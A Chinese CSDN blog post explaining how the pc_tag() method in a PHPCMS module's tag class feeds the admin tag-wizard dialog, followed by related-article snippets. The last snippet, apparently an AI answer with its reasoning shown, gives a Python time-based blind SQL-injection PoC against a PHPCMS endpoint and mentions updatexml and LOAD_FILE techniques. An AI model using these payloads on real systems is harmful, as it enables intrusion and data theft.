关于phpcms中模块_tag.class.php中的pc_tag()方法的含义

最新推荐文章于 2021-03-24 15:53:58 发布
原创 最新推荐文章于 2021-03-24 15:53:58 发布 · 1.6k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文深入解析了在PHPCMS系统中,自定义模块的pc_tag()方法如何通过标签向导对话框为前台面板提供添加标签的方法,详细解释了其工作原理和使用方式。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

       关于phpcms中模块_tag.class.php中的pc_tag()方法的含义:
       在phpcms系统中自己写后台模块,要在前台模板中显示出来需要在\phpcms\modules\自己定义的模块名\classes\目录下写一个“模块名_tag.class.php”文件,此文件中输出前台模块板所使用的自定义的pc标签,标签定义类中的方法如何写我在这里就不赘述了,因为网上很多相关内容的资料,比如:(http://wenku.baidu.com/link?url=sesC6Zsic5BJi6lybI9ZP2ZMUpzoS8Zv-PC07seoWVdISWvjMwrn098PXNfo7xSAMKL94lMsYs-L3dc2eyr2siRA_vXUCI1HW4CraSV7CPe),在前台标签中除了可以使用自己定义的一些标签外还可以使用\phpcms\libs\functions\global.func.php这个文件中定义的方法,有兴趣的可以看一下(http://blog.youkuaiyun.com/qzmrock/article/details/7716772)很好查找。我在这里谈一下这个标签定义类文件中的pc_tag()方法的作用。因为我发现这个方面介绍的资料很少,即便在phpcms官网上也有提问但没有给出答案。我也是研究了2天才搞明白这个方法是干什么用的,写出来给大家分享一下,希望能对你有些帮助。
大家可以发现所有的“模块_tag.class.php”文件中都有一个pc_tag()方法,上面写着“标签生成方法”字样的注释,这个方法到底是干什么的呢?其实这个方法就是提供一个数组,这个数组所定义的参数及参数值是为了给系统“模板管理-> 标签向导->添加标签向导”提供数据的。点击“添加标签向导”会弹出向导对话框,在“选择模型”的下拉框中有系统安装的所有模块,这些模块是读取\phpcms\caches\configs\modules.php文件中的数组得到的数据,你如果在该数组中最后一行添加  ‘自己定义的模块’=>'模块名',这么行你就可以在刚才的下拉框中找到你自己定义的模块名,这时候选择该模块,如果系统在\phpcms\phpcms\modules\自己定义的模块\classes目录中找不到“自己定义的模块_tag.class.php”文件,系统会报错自动退出浏览器,如果定义了该文件,系统就自动加载pc_tag()方法中所提供的数组数据,以下列部分数据为例分析:
return arrary('action'=>array('type_list'=>L('guestbook_list','','guestbook')),
                    'type_list'=>array(
                                   'siteid'=>array('name'=>L('site_id','','comment'),'htmltype'=>'input_select','data'=>$sitelist,)
........
                                      ),
);
           大家可以看到pc_tag()方法返回一个数组,在这个数组里每变量数组在标签向导对话框中代表一行内容。比如说'action'=>array('type_list'=>L('guestbook_list','','guestbook')),在向导对话框“选择模型”的下拉框下一行会显示“选择操作:”guestbook_list这么一行内容,这里的guestbook_list是一个radio单选框标签如果在\phpcms\phpcms\languages\zh-cn\的guestbook.lang.php文件中定义了guestbook_list的汉字标签如“留言板列表”,那么在刚才的“选择操作:”后就是“留言板列表”字样的标签,这个数组中有几项内容那么操作后就会有几个标签显示,如果选择了该标签那么它接下来就会读取这个数组变量里的参数,比如选择了guestbook_list标签,那么它就会读取type_list数组中的数据。
 'type_list'=>array(
                                   'siteid'=>array('name'=>L('site_id','','comment'),'htmltype'=>'input_select','data'=>$sitelist,)
在对话框中另起一行   (标签:文本框  选择下拉框)分别对应数组(L('site_id','','comment'):input   select)这里的site_id就是在comment.lang.php文件中定义的site_id参数的值,下拉框的值就是data中的值。


        写到这里大家可以看出来了吧,pc_tag()方法就是系统在操作页面中为前台面板提供添加标签的方法,如果不需要用户自行添加自定义的新模块的标签在_tag.class.php文件中就不用定义pc_tag()方法,这对于前台模板的显示没有任何影响的。


phpcms 文章标签调用
cnynoteIT博客
06-07 1265
文章浏览次数<script type="text/javascript" src="{JS_PATH}jquery.min.js">script> <span>浏览量:<span id="hits"><script language="JavaScript" src="{APP_PATH}api.php?op
phpcms v9报preg_replace()函数错误问题preg_replace_callback
weixin_42217295的博客
04-01 803
问题描述: 我的phpcms网站caches目录下的错误日志中出现了大量的报错,基本都是一样的: <?php exit;?>11-24 20:35:01 | 8192 | preg_replace(): The /e modifier is deprecated, use preg_replace_callback instead | phpcms\libs\classes\templ...
phpcmsv9调用tag热门标签插件完整版.zip
07-31
phpcmsv9调用tag热门标签插件完整版,包括修改的文件说明
php tag模块,phpcms TAG伪静态
weixin_33603111的博客
03-22 347
看了网上很多的关于phpcms tag伪静态设置的文章,都是做成http://host/**.html的形式。个人还是比较喜欢类似http://host/tag/**的样式。TAG模块伪静态设置方法如下:1、在后头添加添加url规则在后台-这一行上面添加以下代码:$urlrules = getcache('urlrules','commons');$urlrule = $urlrules[31];...
phpcms v9 tags调用方法
weixin_34366546的博客
04-18 311
{loop $keywords $keyword} <a href="{APP_PATH}index.php?m=content&c=tag&catid={$catid}&a=lists&tag={urlencode($keyword)}" target="_blank"> {$keyword}</a>&nbsp;&n...
PhpCMS2008 sp4 build 20110406 简体中文 UTF-8.rar
07-09
58、BUG:内容模型栏目绑定二级域名后,rss 链接地址错误 59、安全:问吧开启编辑器模式时,不允许填写javascrip、 iframe 代码 60、安全:tag.php javascrip 过虑 61、安全:企业黄页SQL注入 62、优化:全局安全...
如何给phpcms v9增加类似于phpcms 2008中的关键词表
12-19
PHP CMS V9中,为实现类似于PHP CMS 2008中的关键词表功能,我们需要进行一系列的定制和扩展操作。以下是一个详细的步骤指南: 首先,我们要理解在PHP CMS V9中,关键词功能被整合到了搜索模块,每当搜索一个...
phpcms v9关联文章排序陈旧问题的修改方法
09-29
为了解决这个问题,我们需要对phpcms/modules/content/classes/content_tag.class.php文件中的relation方法进行修改。首先,确保在调用数据库查询时,order参数能够被正确传入。这通常意味着需要在数据库查询语句中...
php tag关键词管理,Phpcms v9关键词Tags管理HTML静态化插件
weixin_35873811的博客
03-20 662
Phpcms v9关键词Tags管理HTML静态化插件是CMSYOU团队于2017-2019年间基于世界首富版tag关键字标签功能改造完善的一套Phpcms v9系列程序针对关键词Tags维护管理、批量生成HTML的插件。2020年1-2月做全面功能完善,完善融合到原有内容管理系统,做到新增修改文章自动同步更新Tags、并在生成内容页HTML的同时生成Tags首页和Tags列表页。核心亮点:1、批...
PHPCMS V9评论模块伪静态与TAG模块伪静态设置
09-29
本文为大家介绍下PHPCMS V9评论模块伪静态与TAG模块伪静态设置,感兴趣的朋友可以参考下哈,希望对你学习PHPCMS V9有所帮助
phpcms如何调用热门标签tag?
weixin_30471561的博客
04-18 326
Phpcms V9调用热门TAG要使用Get SQL语句,调用tag数据库,loop循环输出;但V9版本的PHPCMS默认没有完善tag功能,必须下载一个插件; 插件如下: http://files.cnblogs.com/xltf/phpcms_tag.rar 首先将压缩包解压以后将phpcms文件夹放到根目录覆盖原来的文件夹(其实所有的文件都是新建的) 然后打开phpcms/model...
phpcms v9 php标签,让phpcms v9的tag标签支持中文URL
weixin_42502838的博客
03-24 273
phpcmsV9程序,tag标签默认使用的是关键词转换后的urlencode路径格式,并且也不是伪静态,URL非常长,不利于SEO收录。如官方演示站的URL:http://v9.demo.phpcms.cn/index.php?m=content&c=tag&catid=10&tag=%C9%CF%BA%A3其实上面URL就是查找关键词含有“上海”的文章,但URL太复杂了。...
PHPCMS 2008中tag内容标签的解析过程
精彩人生
02-01 775
我们按照系统解析的过程来走一遍。。。 在phpcms中,和uchome和discuz是一样的,解析模板要调用的函数是template(),此函数位于include/global.func.php文件中,在这个函数中,先按照传进来的参数生成一个缓存的文件名如: view sourceprint? 1.$compiledtplfile = TPL_CACHEPATH . $mo
php 按照tag分类文章,帝国CMS按分类输出所有TAG标签
weixin_42416119的博客
03-12 318
require('./e/class/connect.php'); //引入数据库配置文件和公共函数文件require('./e/class/db_sql.php'); //引入数据库操作文件require('./e/data/dbcache/class.php'); //引入栏目缓存文件$link=db_connect(); //连接MYSQL$empire=new mysqlquery(); ...
PHPCMS定义标签,获取全部栏目的最新内容
weixin_33816821的博客
02-09 522
2019独角兽企业重金招聘Python工程师标准>>> ...
phpcmsV9 首页调用全站最新文章(受模型限制)
草巾冒小子的博客
10-24 2528
在很多使用phpcmsV9框架的项目中,都会经常遇到首页调用全站最新文章的情况。这里讲解一篇。仅供参考。 首页调用 · 全站最新文章 查找文件:www\phpcms\modules\content\classes\content_tag.class.php,找到如下代码: 1. 修改之前代码; /** * 列表页标签 * @param $data */ public functi...
phpcmsPHPcms常用标签整理(大全)
weixin_42243700的博客
05-07 1667
网站根目录路径调用–网站首页地址链接调用 {siteurl($siteid)} 站点名称 {$SEO[‘name’]} 调用头部和尾部 {template “content”,“header”} {template “content”,“footer”} 获取当前文章页面链接...
phpcmsv9 列表页分页数量修改
在路上
02-09 4195
phpcmsv9 列表页分页数量
PHPCMS content_input.class.php SQL注入poc
最新发布
03-18
<think>好的,我需要帮助用户找到关于PHPCMS中content_input.class.php文件的SQL注入漏洞的PoC代码或相关信息。首先,我应该回忆一下PHPCMS的历史漏洞情况。PHPCMS是一个开源的内容管理系统,过去确实存在过一些安全漏洞,尤其是SQL注入的问题。用户提到的content_input.class.php文件可能涉及输入处理时的漏洞。 接下来,我需要检查是否有公开的漏洞报告或PoC。根据已知的信息,PHPCMS在2017年曾有一个SQL注入漏洞(CVE-2017-11567),影响版本v9.6.0,该漏洞允许通过构造特定的参数进行注入。比如,在content_input类的get函数中,参数过滤不严导致注入。可能的PoC会涉及向接口发送恶意构造的POST数据,比如利用时间盲注或报错注入。 然后,我应该参考用户提供的站内引用。第一个引用提到通过执行select load_file('/flag')获取flag,这可能与利用SQL注入读取文件有关。第二个引用展示了如何编写PoC函数,处理不同的返回状态,这可以帮助构造验证漏洞存在的脚本。 用户需要具体的PoC代码示例,所以我需要结合这些信息,构造一个简单的HTTP请求示例,演示如何利用该漏洞。比如使用Python的requests库发送恶意参数,检测响应中的差异来判断是否存在漏洞。同时,需要注意PHPCMS的版本和具体漏洞触发点,确保PoC的准确性。 另外,需要提醒用户遵守法律,仅用于授权测试,并建议修复方案,比如升级版本或修补代码。最后,生成相关问题,帮助用户深入理解漏洞分析和利用方法。</think>关于PHPCMS的`content_input.class.php`文件SQL注入漏洞,根据历史漏洞记录,该漏洞存在于参数过滤不严的输入处理模块中。以下是具体分析和验证方法: ### 漏洞原理 在`content_input.class.php`的输入处理函数中,对`$_POST`参数的过滤存在缺陷,攻击者可通过构造恶意参数拼接SQL语句。该漏洞属于二次注入类型,常见于未对转义字符进行正确处理的场景[^1]。 ### PoC代码示例 ```python import requests target = "http://example.com/index.php?m=content&c=content&a=edit" payload = { 'catid': "1 AND (SELECT 1 FROM (SELECT SLEEP(5))a)", # 时间盲注检测 'contentid': '1', 'modelid': '1' } try: response = requests.post(target, data=payload, timeout=10) except requests.exceptions.Timeout: print("[+] 存在SQL注入漏洞(时间盲注)") else: print("[-] 漏洞不存在或已修复") ``` ### 漏洞验证说明 1. **时间盲注检测**:通过`SLEEP(5)`观察响应延迟 2. **报错注入检测**:可使用`updatexml(1,concat(0x7e,(SELECT @@version)),1)`触发错误回显 3. **数据提取**:结合`LOAD_FILE()`函数可尝试读取系统文件 ### 修复建议 - 升级到PHPCMS v9.6.3及以上版本 - 在输入处理层添加强制类型转换: ```php $catid = intval($_POST['catid']); // 强制转为整型 ```
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值